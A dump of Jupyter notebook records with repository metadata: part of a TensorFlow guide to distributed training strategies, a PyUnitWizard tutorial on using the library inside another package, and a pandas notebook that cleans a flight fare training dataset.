tf.distribute.MirroredStrategy(devices=[\"/gpu:0\", \"/gpu:1\"])", "_____no_output_____" ] ], [ [ "If you wish to override the cross device communication, you can do so using the `cross_device_ops` argument by supplying an instance of `tf.distribute.CrossDeviceOps`. Currently we provide `tf.distribute.HierarchicalCopyAllReduce` and `tf.distribute.ReductionToOneDevice` as 2 other options other than `tf.distribute.NcclAllReduce` which is the default.", "_____no_output_____" ] ], [ [ "mirrored_strategy = tf.distribute.MirroredStrategy(\n cross_device_ops=tf.distribute.HierarchicalCopyAllReduce())", "_____no_output_____" ] ], [ [ "### CentralStorageStrategy\n`tf.distribute.experimental.CentralStorageStrategy` does synchronous training as well. Variables are not mirrored, instead they are placed on the CPU and operations are replicated across all local GPUs. If there is only one GPU, all variables and operations will be placed on that GPU.\n\nCreate a `CentralStorageStrategy` by:\n", "_____no_output_____" ] ], [ [ "central_storage_strategy = tf.distribute.experimental.CentralStorageStrategy()", "_____no_output_____" ] ], [ [ "This will create a `CentralStorageStrategy` instance which will use all visible GPUs and CPU. Update to variables on replicas will be aggragated before being applied to variables.", "_____no_output_____" ], [ "Note: This strategy is [`experimental`](https://www.tensorflow.org/guide/version_compat#what_is_not_covered) as we are currently improving it and making it work for more scenarios. As part of this, please expect the APIs to change in the future.", "_____no_output_____" ], [ "### MultiWorkerMirroredStrategy\n\n`tf.distribute.experimental.MultiWorkerMirroredStrategy` is very similar to `MirroredStrategy`. It implements synchronous distributed training across multiple workers, each with potentially multiple GPUs. Similar to `MirroredStrategy`, it creates copies of all variables in the model on each device across all workers.\n\nIt uses [CollectiveOps](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/python/ops/collective_ops.py) as the multi-worker all-reduce communication method used to keep variables in sync. A collective op is a single op in the TensorFlow graph which can automatically choose an all-reduce algorithm in the TensorFlow runtime according to hardware, network topology and tensor sizes.\n\nIt also implements additional performance optimizations. For example, it includes a static optimization that converts multiple all-reductions on small tensors into fewer all-reductions on larger tensors. In addition, we are designing it to have a plugin architecture - so that in the future, users will be able to plugin algorithms that are better tuned for their hardware. Note that collective ops also implement other collective operations such as broadcast and all-gather.\n\nHere is the simplest way of creating `MultiWorkerMirroredStrategy`:", "_____no_output_____" ] ], [ [ "multiworker_strategy = tf.distribute.experimental.MultiWorkerMirroredStrategy()", "_____no_output_____" ] ], [ [ "`MultiWorkerMirroredStrategy` currently allows you to choose between two different implementations of collective ops. `CollectiveCommunication.RING` implements ring-based collectives using gRPC as the communication layer. `CollectiveCommunication.NCCL` uses [Nvidia's NCCL](https://developer.nvidia.com/nccl) to implement collectives. `CollectiveCommunication.AUTO` defers the choice to the runtime. The best choice of collective implementation depends upon the number and kind of GPUs, and the network interconnect in the cluster. You can specify them like so:\n", "_____no_output_____" ] ], [ [ "multiworker_strategy = tf.distribute.experimental.MultiWorkerMirroredStrategy(\n tf.distribute.experimental.CollectiveCommunication.NCCL)", "_____no_output_____" ] ], [ [ "\nOne of the key differences to get multi worker training going, as compared to multi-GPU training, is the multi-worker setup. \"TF_CONFIG\" environment variable is the standard way in TensorFlow to specify the cluster configuration to each worker that is part of the cluster. See section on [\"TF_CONFIG\" below](#TF_CONFIG) for more details on how this can be done.\n\n", "_____no_output_____" ], [ "Note: This strategy is [`experimental`](https://www.tensorflow.org/guide/version_compat#what_is_not_covered) as we are currently improving it and making it work for more scenarios. As part of this, please expect the APIs to change in the future.", "_____no_output_____" ], [ "### TPUStrategy\n`tf.distribute.experimental.TPUStrategy` lets users run their TensorFlow training on Tensor Processing Units (TPUs). TPUs are Google's specialized ASICs designed to dramatically accelerate machine learning workloads. They are available on Google Colab, the [TensorFlow Research Cloud](https://www.tensorflow.org/tfrc) and [Google Compute Engine](https://cloud.google.com/tpu).\n\nIn terms of distributed training architecture, TPUStrategy is the same `MirroredStrategy` - it implements synchronous distributed training. TPUs provide their own implementation of efficient all-reduce and other collective operations across multiple TPU cores, which are used in `TPUStrategy`.\n\nHere is how you would instantiate `TPUStrategy`.\nNote: To run this code in Colab, you should select TPU as the Colab runtime. See [Using TPUs]( tpu.ipynb) guide for a runnable version.\n\n```\nresolver = tf.distribute.cluster_resolver.TPUClusterResolver()\ntf.tpu.experimental.initialize_tpu_system(resolver)\ntpu_strategy = tf.distribute.experimental.TPUStrategy(resolver)\n```\n", "_____no_output_____" ], [ "`TPUClusterResolver` instance helps locate the TPUs. In Colab, you don't need to specify any arguments to it. If you want to use this for Cloud TPUs, you will need to specify the name of your TPU resource in `tpu` argument. We also need to initialize the tpu system explicitly at the start of the program. This is required before TPUs can be used for computation and should ideally be done at the beginning because it also wipes out the TPU memory so all state will be lost.", "_____no_output_____" ], [ "Note: This strategy is [`experimental`](https://www.tensorflow.org/guide/version_compat#what_is_not_covered) as we are currently improving it and making it work for more scenarios. As part of this, please expect the APIs to change in the future.", "_____no_output_____" ], [ "### ParameterServerStrategy\n`tf.distribute.experimental.ParameterServerStrategy` supports parameter servers training on multiple machines. In this setup, some machines are designated as workers and some as parameter servers. Each variable of the model is placed on one parameter server. Computation is replicated across all GPUs of the all the workers.\n\nIn terms of code, it looks similar to other strategies:\n```\nps_strategy = tf.distribute.experimental.ParameterServerStrategy()\n```", "_____no_output_____" ], [ "For multi worker training, \"TF_CONFIG\" needs to specify the configuration of parameter servers and workers in your cluster, which you can read more about in [\"TF_CONFIG\" below](#TF_CONFIG) below.", "_____no_output_____" ], [ "\nSo far we've talked about what are the different stategies available and how you can instantiate them. In the next few sections, we will talk about the different ways in which you can use them to distribute your training. We will show short code snippets in this guide and link off to full tutorials which you can run end to end.", "_____no_output_____" ], [ "## Using `tf.distribute.Strategy` with Keras\nWe've integrated `tf.distribute.Strategy` into `tf.keras` which is TensorFlow's implementation of the\n[Keras API specification](https://keras.io). `tf.keras` is a high-level API to build and train models. By integrating into `tf.keras` backend, we've made it seamless for Keras users to distribute their training written in the Keras training framework. The only things that need to change in a user's program are: (1) Create an instance of the appropriate `tf.distribute.Strategy` and (2) Move the creation and compiling of Keras model inside `strategy.scope`.\n\nHere is a snippet of code to do this for a very simple Keras model with one dense layer:", "_____no_output_____" ] ], [ [ "mirrored_strategy = tf.distribute.MirroredStrategy()\nwith mirrored_strategy.scope():\n model = tf.keras.Sequential([tf.keras.layers.Dense(1, input_shape=(1,))])\n model.compile(loss='mse', optimizer='sgd')", "_____no_output_____" ] ], [ [ "In this example we used `MirroredStrategy` so we can run this on a machine with multiple GPUs. `strategy.scope()` indicated which parts of the code to run distributed. Creating a model inside this scope allows us to create mirrored variables instead of regular variables. Compiling under the scope allows us to know that the user intends to train this model using this strategy. Once this is setup, you can fit your model like you would normally. `MirroredStrategy` takes care of replicating the model's training on the available GPUs, aggregating gradients etc.", "_____no_output_____" ] ], [ [ "dataset = tf.data.Dataset.from_tensors(([1.], [1.])).repeat(100).batch(10)\nmodel.fit(dataset, epochs=2)\nmodel.evaluate(dataset)", "_____no_output_____" ] ], [ [ "Here we used a `tf.data.Dataset` to provide the training and eval input. You can also use numpy arrays:", "_____no_output_____" ] ], [ [ "import numpy as np\ninputs, targets = np.ones((100, 1)), np.ones((100, 1))\nmodel.fit(inputs, targets, epochs=2, batch_size=10)", "_____no_output_____" ] ], [ [ "In both cases (dataset or numpy), each batch of the given input is divided equally among the multiple replicas. For instance, if using `MirroredStrategy` with 2 GPUs, each batch of size 10 will get divided among the 2 GPUs, with each receiving 5 input examples in each step. Each epoch will then train faster as you add more GPUs. Typically, you would want to increase your batch size as you add more accelerators so as to make effective use of the extra computing power. You will also need to re-tune your learning rate, depending on the model. You can use `strategy.num_replicas_in_sync` to get the number of replicas.", "_____no_output_____" ] ], [ [ "# Compute global batch size using number of replicas.\nBATCH_SIZE_PER_REPLICA = 5\nglobal_batch_size = (BATCH_SIZE_PER_REPLICA *\n mirrored_strategy.num_replicas_in_sync)\ndataset = tf.data.Dataset.from_tensors(([1.], [1.])).repeat(100)\ndataset = dataset.batch(global_batch_size)\n\nLEARNING_RATES_BY_BATCH_SIZE = {5: 0.1, 10: 0.15}\nlearning_rate = LEARNING_RATES_BY_BATCH_SIZE[global_batch_size]", "_____no_output_____" ] ], [ [ "### What's supported now?\n\nIn [TF nightly release](https://pypi.org/project/tf-nightly-gpu/), we now support training with Keras using all strategies.\n\nNote: When using `MultiWorkerMirorredStrategy` for multiple workers or `TPUStrategy` with more than one host with Keras, currently the user will have to explicitly shard or shuffle the data for different workers, but we will change this in the future to automatically shard the input data intelligently.\n\n### Examples and Tutorials\n\nHere is a list of tutorials and examples that illustrate the above integration end to end with Keras:\n1. [Tutorial](../tutorials/distribute/keras.ipynb) to train MNIST with `MirroredStrategy`.\n2. Official [ResNet50](https://github.com/tensorflow/models/blob/master/official/resnet/keras/keras_imagenet_main.py) training with ImageNet data using `MirroredStrategy`.\n3. [ResNet50](https://github.com/tensorflow/tpu/blob/master/models/experimental/resnet50_keras/resnet50.py) trained with Imagenet data on Cloud TPus with `TPUStrategy`.", "_____no_output_____" ], [ "## Using `tf.distribute.Strategy` with Estimator\n`tf.estimator` is a distributed training TensorFlow API that originally supported the async parameter server approach. Like with Keras, we've integrated `tf.distribute.Strategy` into `tf.Estimator` so that a user who is using Estimator for their training can easily change their training is distributed with very few changes to your their code. With this, estimator users can now do synchronous distributed training on multiple GPUs and multiple workers, as well as use TPUs.\n\nThe usage of `tf.distribute.Strategy` with Estimator is slightly different than the Keras case. Instead of using `strategy.scope`, now we pass the strategy object into the [`RunConfig`](https://www.tensorflow.org/api_docs/python/tf/estimator/RunConfig) for the Estimator.\n\nHere is a snippet of code that shows this with a premade estimator `LinearRegressor` and `MirroredStrategy`:\n", "_____no_output_____" ] ], [ [ "mirrored_strategy = tf.distribute.MirroredStrategy()\nconfig = tf.estimator.RunConfig(\n train_distribute=mirrored_strategy, eval_distribute=mirrored_strategy)\nregressor = tf.estimator.LinearRegressor(\n feature_columns=[tf.feature_column.numeric_column('feats')],\n optimizer='SGD',\n config=config)", "_____no_output_____" ] ], [ [ "We use a premade Estimator here, but the same code works with a custom Estimator as well. `train_distribute` determines how training will be distributed, and `eval_distribute` determines how evaluation will be distributed. This is another difference from Keras where we use the same strategy for both training and eval.\n\nNow we can train and evaluate this Estimator with an input function:\n", "_____no_output_____" ] ], [ [ "def input_fn():\n dataset = tf.data.Dataset.from_tensors(({\"feats\":[1.]}, [1.]))\n return dataset.repeat(1000).batch(10)\nregressor.train(input_fn=input_fn, steps=10)\nregressor.evaluate(input_fn=input_fn, steps=10)", "_____no_output_____" ] ], [ [ "Another difference to highlight here between Estimator and Keras is the input handling. In Keras, we mentioned that each batch of the dataset is split across the multiple replicas. In Estimator, however, the user provides an `input_fn` and have full control over how they want their data to be distributed across workers and devices. We do not do automatic splitting of batch, nor automatically shard the data across different workers. The provided `input_fn` is called once per worker, thus giving one dataset per worker. Then one batch from that dataset is fed to one replica on that worker, thereby consuming N batches for N replicas on 1 worker. In other words, the dataset returned by the `input_fn` should provide batches of size `PER_REPLICA_BATCH_SIZE`. And the global batch size for a step can be obtained as `PER_REPLICA_BATCH_SIZE * strategy.num_replicas_in_sync`. When doing multi worker training, users will also want to either split their data across the workers, or shuffle with a random seed on each. You can see an example of how to do this in the [multi-worker tutorial](../tutorials/distribute/multi_worker.ipynb).", "_____no_output_____" ], [ "We showed an example of using `MirroredStrategy` with Estimator. You can also use `TPUStrategy` with Estimator as well, in the exact same way:\n```\nconfig = tf.estimator.RunConfig(\n train_distribute=tpu_strategy, eval_distribute=tpu_strategy)\n```", "_____no_output_____" ], [ "And similarly, you can use multi worker and parameter server strategies as well. The code remains the same, but you need to use `tf.estimator.train_and_evaluate`, and set \"TF_CONFIG\" environment variables for each binary running in your cluster.", "_____no_output_____" ], [ "### What's supported now?\n\nIn TF nightly release, we support training with Estimator using all strategies.\n\n### Examples and Tutorials\nHere are some examples that show end to end usage of various strategies with Estimator:\n\n1. [End to end example](https://github.com/tensorflow/ecosystem/tree/master/distribution_strategy) for multi worker training in tensorflow/ecosystem using Kuberentes templates. This example starts with a Keras model and converts it to an Estimator using the `tf.keras.estimator.model_to_estimator` API.\n2. Official [ResNet50](https://github.com/tensorflow/models/blob/master/official/resnet/imagenet_main.py) model, which can be trained using either `MirroredStrategy` or `MultiWorkerMirroredStrategy`.\n3. [ResNet50](https://github.com/tensorflow/tpu/blob/master/models/experimental/distribution_strategy/resnet_estimator.py) example with TPUStrategy.", "_____no_output_____" ], [ "## Using `tf.distribute.Strategy` with custom training loops\nAs you've seen, using `tf.distrbute.Strategy` with high level APIs is only a couple lines of code change. With a little more effort, `tf.distrbute.Strategy` can also be used by other users who are not using these frameworks.\n\nTensorFlow is used for a wide variety of use cases and some users (such as researchers) require more flexibility and control over their training loops. This makes it hard for them to use the high level frameworks such as Estimator or Keras. For instance, someone using a GAN may want to take a different number of generator or discriminator steps each round. Similarly, the high level frameworks are not very suitable for Reinforcement Learning training. So these users will usually write their own training loops.\n\nFor these users, we provide a core set of methods through the `tf.distrbute.Strategy` classes. Using these may require minor restructuring of the code initially, but once that is done, the user should be able to switch between GPUs / TPUs / multiple machines by just changing the strategy instance.\n\nHere we will show a brief snippet illustrating this use case for a simple training example using the same Keras model as before.\nNote: These APIs are still experimental and we are improving them to make them more user friendly.", "_____no_output_____" ], [ "First, we create the model and optimizer inside the strategy's scope. This ensures that any variables created with the model and optimizer are mirrored variables.", "_____no_output_____" ] ], [ [ "with mirrored_strategy.scope():\n model = tf.keras.Sequential([tf.keras.layers.Dense(1, input_shape=(1,))])\n optimizer = tf.train.GradientDescentOptimizer(0.1)", "_____no_output_____" ] ], [ [ "Next, we create the input dataset and call `make_dataset_iterator` to distribute the dataset based on the strategy. This API is expected to change in the near future.", "_____no_output_____" ] ], [ [ "with mirrored_strategy.scope():\n dataset = tf.data.Dataset.from_tensors(([1.], [1.])).repeat(1000).batch(\n global_batch_size)\n input_iterator = mirrored_strategy.make_dataset_iterator(dataset)", "_____no_output_____" ] ], [ [ "Then, we define one step of the training. We will use `tf.GradientTape` to compute gradients and optimizer to apply those gradients to update our model's variables. To distribute this training step, we put it in a function `step_fn` and pass it to `strategy.experimental_run` along with the iterator created before:", "_____no_output_____" ] ], [ [ "def train_step():\n def step_fn(inputs):\n features, labels = inputs\n logits = model(features)\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits(\n logits=logits, labels=labels)\n loss = tf.reduce_sum(cross_entropy) * (1.0 / global_batch_size)\n train_op = optimizer.minimize(loss)\n with tf.control_dependencies([train_op]):\n return tf.identity(loss)\n\n per_replica_losses = mirrored_strategy.experimental_run(\n step_fn, input_iterator)\n mean_loss = mirrored_strategy.reduce(\n tf.distribute.ReduceOp.SUM, per_replica_losses, axis=None)\n return mean_loss", "_____no_output_____" ] ], [ [ "A few other things to note in the code above:\n1. We used `tf.nn.softmax_cross_entropy_with_logits` to compute the loss. And then we scaled the total loss by the global batch size. This is important because all the replicas are training in sync and number of examples in each step of training is the global batch. So the loss needs to be divided by the global batch size and not by the replica (local) batch size.\n2. We used the `strategy.reduce` API to aggregate the results returned by `experimental_run`. `experimental_run` returns results from each local replica in the strategy, and there are multiple ways to consume this result. You can `reduce` them to get an aggregated value. You can also do `strategy.unwrap(results)`* to get the list of values contained in the result, one per local replica.\n\n*expected to change\n", "_____no_output_____" ], [ "Finally, once we have defined the training step, we can initialize the iterator and variables and run the training in a loop:", "_____no_output_____" ] ], [ [ "with mirrored_strategy.scope():\n iterator_init = input_iterator.initialize()\n var_init = tf.global_variables_initializer()\n loss = train_step()\n with tf.Session() as sess:\n sess.run([iterator_init, var_init])\n for _ in range(10):\n print(sess.run(loss))", "_____no_output_____" ] ], [ [ "In the example above, we used `make_dataset_iterator` to provide input to your training. We also provide two additional APIs: `make_input_fn_iterator` and `make_experimental_numpy_iterator` to support other kinds of inputs. See their documentation in `tf.distribute.Strategy` and how they differ from `make_dataset_iterator`.", "_____no_output_____" ], [ "This covers the simplest case of using `tf.distribute.Strategy` API to do distribute custom training loops. We are in the process of improving these APIs. Since this use case requres more work on the part of the user, we will be publishing a separate detailed guide for this use case in the future.", "_____no_output_____" ], [ "### What's supported now?\nIn TF nightly release, we support training with custom training loops using `MirroredStrategy` and `TPUStrategy` as shown above. Support for other strategies will be coming in soon. `MultiWorkerMirorredStrategy` support will be coming in the future.\n\n### Examples and Tutorials\nHere are some examples for using distribution strategy with custom training loops:\n1. [Example](https://github.com/tensorflow/tensorflow/blob/5456cc28f3f8d9c17c645d9a409e495969e584ae/tensorflow/contrib/distribute/python/examples/mnist_tf1_tpu.py) to train MNIST using `TPUStrategy`.\n", "_____no_output_____" ], [ "## Other topics\nIn this section, we will cover some topics that are relevant to multiple use cases.", "_____no_output_____" ], [ "<a id=\"TF_CONFIG\">\n### Setting up TF\\_CONFIG environment variable\n</a>\nFor multi-worker training, as mentioned before, you need to set \"TF\\_CONFIG\" environment variable for each\nbinary running in your cluster. The \"TF\\_CONFIG\" environment variable is a JSON string which specifies what\ntasks constitute a cluster, their addresses and each task's role in the cluster. We provide a Kubernetes template in the\n[tensorflow/ecosystem](https://github.com/tensorflow/ecosystem) repo which sets\n\"TF\\_CONFIG\" for your training tasks.\n\nOne example of \"TF\\_CONFIG\" is:\n```\nos.environ[\"TF_CONFIG\"] = json.dumps({\n \"cluster\": {\n \"worker\": [\"host1:port\", \"host2:port\", \"host3:port\"],\n \"ps\": [\"host4:port\", \"host5:port\"]\n },\n \"task\": {\"type\": \"worker\", \"index\": 1}\n})\n```\n", "_____no_output_____" ], [ "This \"TF\\_CONFIG\" specifies that there are three workers and two ps tasks in the\ncluster along with their hosts and ports. The \"task\" part specifies that the\nrole of the current task in the cluster, worker 1 (the second worker). Valid roles in a cluster is\n\"chief\", \"worker\", \"ps\" and \"evaluator\". There should be no \"ps\" job except when using `tf.distribute.experimental.ParameterServerStrategy`.", "_____no_output_____" ], [ "## What's next?\n\n`tf.distribute.Strategy` is actively under development. We welcome you to try it out and provide your feedback via [issues on GitHub](https://github.com/tensorflow/tensorflow/issues/new).", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ] ]
e72f154f80a5242e18323f0d1e82b9a045832f39
5,505
ipynb
Jupyter Notebook
docs/contents/In_Your_Library.ipynb
dprada/pyunitwizard
dbfd0c015f9359c76e7e59a5c16ab469b86aed34
[ "MIT" ]
null
null
null
docs/contents/In_Your_Library.ipynb
dprada/pyunitwizard
dbfd0c015f9359c76e7e59a5c16ab469b86aed34
[ "MIT" ]
null
null
null
docs/contents/In_Your_Library.ipynb
dprada/pyunitwizard
dbfd0c015f9359c76e7e59a5c16ab469b86aed34
[ "MIT" ]
null
null
null
25.368664
230
0.547321
[ [ [ "# PyUnitWizard in your library\n*-Instructions to work with PyUnitWizard inside your own library-*\n\nHere you can find the instructions to include PyUnitWizard in your projects. Following this indications, you don't need to worry about the requirements of the libraries supported by PyUnitWizard.\n\nTo illustrate how to include PyUnitWizard let's see a very simple library you can find in [github repository (examples directory)](https://github.com/uibcdf/PyUnitWizard/tree/main/examples): `testlib`. This is its structure:", "_____no_output_____" ], [ "```bash\ntree --dirsfirst --charset=markdown testlib\n```", "_____no_output_____" ], [ "```\ntestlib\n|-- box\n| |-- __init__.py\n| |-- methods_a.py\n| |-- methods_b.py\n| `-- methods_c.py\n|-- _pyunitwizard\n| `-- __init__.py\n|-- __init__.py\n```", "_____no_output_____" ], [ "Make a directory named `_pyunitwizard` in your project top directory. And include in `_pyunitwizard` a `__init__.py` file such as:", "_____no_output_____" ], [ "```python\n### testlib/_pyunitwizard/__init__.py ###\nimport pyunitwizard as puw\n\n# In this case Pint and openmm.unit are loaded:\npuw.load_libraries(['pint', 'openmm.unit'])\n\n# And openmm.unit is defined as default form\npuw.set_default_form('openmm.unit')\n```", "_____no_output_____" ], [ "Now, let's define some methods using your `_pyunitwizard` module. The first ones in the file `main.py`:", "_____no_output_____" ], [ "```python\n### testlib/main.py ###\nfrom ._pyunitwizard import puw\n\ndef sum_quantities(a, b, form=None):\n\n aa = puw.string_to_quantity(a, to_form=form)\n bb = puw.string_to_quantity(b, to_form=form)\n output = aa+bb\n\n return output\n\ndef get_form(quantity):\n\n return puw.get_form(quantity)\n\ndef libraries_loaded():\n\n return puw.libraries_loaded()\n```", "_____no_output_____" ], [ "And in a directory named `box` let's include two methods to test your `_pyunitwizard` module:", "_____no_output_____" ], [ "```python\n### testlib/box/methods_a.py\nfrom .._pyunitwizard import puw\n\ndef get_default_form():\n\n return puw.get_default_form()\n```\n\n```python\n### testlib/box/methods_b.py\nfrom .._pyunitwizard import puw\n\ndef set_default_form(form):\n\n return puw.set_default_form(form)\n```\n", "_____no_output_____" ], [ "Finnally, let's writte the `__init__.py` files in the top directory and in `box`:", "_____no_output_____" ], [ "```python\n# testlib/box/__init__.py\nfrom .methods_a import get_default_form\nfrom .methods_b import set_default_form\n```\n\n```python\n# testlib/__init__.py\nfrom .main import sum_quantities, get_form, libraries_loaded\nfrom . import box\n```", "_____no_output_____" ], [ "This way we already have a simple library using PyUnitWizard. You can check how `testlib` works:", "_____no_output_____" ], [ "```ipython\nIn [1]: import testlib\n\nIn [2]: testlib.libraries_loaded()\nOut[2]: ['pint', 'openmm.unit']\n\nIn [3]: q = testlib.sum_quantities('2cm','3cm')\n\nIn [4]: testlib.get_form(q)\nOut[4]: 'openmm.unit'\n\nIn [5]: testlib.box.get_default_form()\nOut[5]: 'openmm.unit'\n\nIn [6]: testlib.box.set_default_form('pint')\n\nIn [7]: q = testlib.sum_quantities('2cm','3cm')\n\nIn [8]: testlib.get_form(q)\nOut[8]: 'pint'\n```", "_____no_output_____" ], [ "<div class=\"alert alert-block alert-info\">\n<b>Tip:</b> Together with testlib, in the github repository, you can find testlib2\nwhere pyunitwizard is included using only absolut import paths -as suggested by <a href=\"https://www.python.org/dev/peps/pep-0008/#imports\">PEP8</a>-</div>", "_____no_output_____" ] ] ]
[ "markdown" ]
[ [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ] ]
e72f167fcca5d259303de6e3233bf05be56b433e
88,095
ipynb
Jupyter Notebook
Data_Clean_Train.ipynb
amanattar/Flight-Fare-Prediction
45bf23c4814cc380302387f5a6fb819267ed0946
[ "MIT" ]
null
null
null
Data_Clean_Train.ipynb
amanattar/Flight-Fare-Prediction
45bf23c4814cc380302387f5a6fb819267ed0946
[ "MIT" ]
null
null
null
Data_Clean_Train.ipynb
amanattar/Flight-Fare-Prediction
45bf23c4814cc380302387f5a6fb819267ed0946
[ "MIT" ]
null
null
null
32.688312
114
0.322527
[ [ [ "import numpy as np\nimport pandas as pd", "_____no_output_____" ], [ "df = pd.read_csv(\"Dataset/Data_Train.csv\")", "_____no_output_____" ], [ "df.shape", "_____no_output_____" ], [ "df.isnull().sum()", "_____no_output_____" ], [ "df = df.dropna()", "_____no_output_____" ], [ "df.isnull().sum()", "_____no_output_____" ], [ "df.head(10)", "_____no_output_____" ], [ "df.info()", "<class 'pandas.core.frame.DataFrame'>\nInt64Index: 10682 entries, 0 to 10682\nData columns (total 11 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 Airline 10682 non-null object\n 1 Date_of_Journey 10682 non-null object\n 2 Source 10682 non-null object\n 3 Destination 10682 non-null object\n 4 Route 10682 non-null object\n 5 Dep_Time 10682 non-null object\n 6 Arrival_Time 10682 non-null object\n 7 Duration 10682 non-null object\n 8 Total_Stops 10682 non-null object\n 9 Additional_Info 10682 non-null object\n 10 Price 10682 non-null int64 \ndtypes: int64(1), object(10)\nmemory usage: 1001.4+ KB\n" ], [ "df.nunique()", "_____no_output_____" ], [ "df[\"Journey_Month\"] = pd.to_datetime(df[\"Date_of_Journey\"],format = \"%d/%m/%Y\").dt.month\ndf[\"Journey_Day\"] = pd.to_datetime(df[\"Date_of_Journey\"],format=\"%d/%m/%Y\").dt.day", "_____no_output_____" ], [ "df.head()", "_____no_output_____" ], [ "df[\"Airline\"].unique()", "_____no_output_____" ], [ "df.drop(df.loc[df['Airline']==\"Trujet\"].index, inplace=True)", "_____no_output_____" ], [ "df[\"Airline\"].unique()", "_____no_output_____" ], [ "df.drop([\"Date_of_Journey\"],axis=1,inplace=True)", "_____no_output_____" ], [ "df[\"Dep_hour\"] = pd.to_datetime(df[\"Dep_Time\"]).dt.hour\ndf[\"Dep_min\"] = pd.to_datetime(df[\"Dep_Time\"]).dt.minute\ndf.drop(['Dep_Time'],axis=1,inplace=True)", "_____no_output_____" ], [ "df.head()", "_____no_output_____" ], [ "df[\"Arrival_hour\"] = pd.to_datetime(df['Arrival_Time']).dt.hour\ndf[\"Arrival_min\"] = pd.to_datetime(df['Arrival_Time']).dt.minute\ndf.drop([\"Arrival_Time\"],axis=1,inplace=True)", "_____no_output_____" ], [ "df.head()", "_____no_output_____" ], [ "duration = list(df[\"Duration\"])\n\nfor i in range(len(duration)):\n if len(duration[i].split()) != 2: # Check if duration contains only hour or mins\n if \"h\" in duration[i]:\n duration[i] = duration[i].strip() + \" 0m\" # Adds 0 minute\n else:\n duration[i] = \"0h \" + duration[i]\n # Adds 0 hour\n\nduration_hours = []\nduration_mins = []\nfor i in range(len(duration)):\n duration_hours.append(int(duration[i].split(sep = \"h\")[0])) # Extract hours from duration\n duration_mins.append(int(duration[i].split(sep = \"m\")[0].split()[-1]))", "_____no_output_____" ], [ "df[\"Duration_hour\"] = duration_hours\ndf[\"Duration_min\"] = duration_mins", "_____no_output_____" ], [ "df.head()", "_____no_output_____" ], [ "df.drop([\"Duration\"],axis=1,inplace=True)", "_____no_output_____" ], [ "df.head()", "_____no_output_____" ], [ "df.drop(['Route','Additional_Info'],axis=1,inplace=True)", "_____no_output_____" ], [ "df.head()", "_____no_output_____" ], [ "Airline = pd.get_dummies(df[[\"Airline\"]],drop_first=True)\nSource = pd.get_dummies(df[[\"Source\"]],drop_first=True)\nDestination = pd.get_dummies(df[[\"Destination\"]],drop_first=True)", "_____no_output_____" ], [ "Airline.head()", "_____no_output_____" ], [ "Source.head()", "_____no_output_____" ], [ "Destination.head()", "_____no_output_____" ], [ "df['Total_Stops'].unique()", "_____no_output_____" ], [ "df.replace({\"non-stop\": 0, \"1 stop\": 1, \"2 stops\": 2, \"3 stops\": 3, \"4 stops\": 4}, inplace = True)", "_____no_output_____" ], [ "df.head()", "_____no_output_____" ], [ "train_data = pd.concat([df,Airline,Source,Destination],axis=1)", "_____no_output_____" ], [ "train_data.head()", "_____no_output_____" ], [ "train_data.drop(['Airline',\"Source\",\"Destination\"],axis=1,inplace=True)", "_____no_output_____" ], [ "train_data.head()", "_____no_output_____" ], [ "train_data.shape", "_____no_output_____" ], [ "train_data.info()", "<class 'pandas.core.frame.DataFrame'>\nInt64Index: 10681 entries, 0 to 10682\nData columns (total 29 columns):\n # Column Non-Null Count Dtype\n--- ------ -------------- -----\n 0 Total_Stops 10681 non-null int64\n 1 Price 10681 non-null int64\n 2 Journey_Month 10681 non-null int64\n 3 Journey_Day 10681 non-null int64\n 4 Dep_hour 10681 non-null int64\n 5 Dep_min 10681 non-null int64\n 6 Arrival_hour 10681 non-null int64\n 7 Arrival_min 10681 non-null int64\n 8 Duration_hour 10681 non-null int64\n 9 Duration_min 10681 non-null int64\n 10 Airline_Air India 10681 non-null uint8\n 11 Airline_GoAir 10681 non-null uint8\n 12 Airline_IndiGo 10681 non-null uint8\n 13 Airline_Jet Airways 10681 non-null uint8\n 14 Airline_Jet Airways Business 10681 non-null uint8\n 15 Airline_Multiple carriers 10681 non-null uint8\n 16 Airline_Multiple carriers Premium economy 10681 non-null uint8\n 17 Airline_SpiceJet 10681 non-null uint8\n 18 Airline_Vistara 10681 non-null uint8\n 19 Airline_Vistara Premium economy 10681 non-null uint8\n 20 Source_Chennai 10681 non-null uint8\n 21 Source_Delhi 10681 non-null uint8\n 22 Source_Kolkata 10681 non-null uint8\n 23 Source_Mumbai 10681 non-null uint8\n 24 Destination_Cochin 10681 non-null uint8\n 25 Destination_Delhi 10681 non-null uint8\n 26 Destination_Hyderabad 10681 non-null uint8\n 27 Destination_Kolkata 10681 non-null uint8\n 28 Destination_New Delhi 10681 non-null uint8\ndtypes: int64(10), uint8(19)\nmemory usage: 1.1 MB\n" ], [ "train_data.to_csv(\"Dataset/train_clean_data.csv\",index = False)", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
